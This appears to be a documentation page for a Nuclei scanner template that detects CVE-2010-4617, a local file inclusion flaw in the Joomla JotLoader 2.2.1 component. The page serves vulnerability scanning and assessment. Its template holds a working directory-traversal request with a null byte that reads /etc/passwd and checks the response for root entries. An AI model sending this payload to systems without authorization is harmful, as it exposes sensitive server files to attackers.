Skip to content

Joomla! Component JotLoader 2.2.1 - Local File Inclusion

ID: CVE-2010-4617

Severity: medium

Author: daffainfo

Tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich

A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.

id: CVE-2010-4617
info:
name: Joomla! Component JotLoader 2.2.1 - Local File Inclusion
author: daffainfo
severity: medium
description: A directory traversal vulnerability in the JotLoader (com_jotloader) component 2.2.1 for Joomla! allows remote attackers to read arbitrary files via directory traversal sequences in the section parameter to index.php.
impact: |
Successful exploitation of this vulnerability can lead to unauthorized access to sensitive files.
remediation: Upgrade to the latest version to mitigate this vulnerability.
reference:
- https://www.exploit-db.com/exploits/15791
- https://nvd.nist.gov/vuln/detail/CVE-2010-4617
- http://packetstormsecurity.org/files/view/96812/joomlajotloader-lfi.txt
- https://exchange.xforce.ibmcloud.com/vulnerabilities/64223
- https://github.com/ARPSyndicate/kenzer-templates
classification:
cvss-metrics: CVSS:2.0/AV:N/AC:M/Au:N/C:P/I:P/A:P
cvss-score: 6.8
cve-id: CVE-2010-4617
cwe-id: CWE-22
epss-score: 0.00826
epss-percentile: 0.80104
cpe: cpe:2.3:a:kanich:com_jotloader:2.2.1:*:*:*:*:*:*:*
metadata:
max-request: 1
vendor: kanich
product: com_jotloader
tags: cve,cve2010,joomla,lfi,edb,packetstorm,kanich
http:
- method: GET
path:
- "{{BaseURL}}/index.php?option=com_jotloader&section=../../../../../../../../../../../../../../etc/passwd%00"
matchers-condition: and
matchers:
- type: regex
regex:
- "root:.*:0:0:"
- type: status
status:
- 200
# digest: 490a00463044022027f991fc8c3ab9b6d5d7c5924fd2dea1fbcadcac2d1223f1d891675ee4aec53c022058548f084090aa3cb8c50bb3b1a862b38d495b54c48cdb150b5fd0e7f63b45fb:922c64590222798bb761d5b6d8e72950

This template is used to detect vulnerabilities in web applications. It can be used with the Nuclei tool to scan for specific patterns or behaviors.

Terminal window
$ nuclei -u "URL" -t "http/cves/2010/CVE-2010-4617.yaml"

View on Github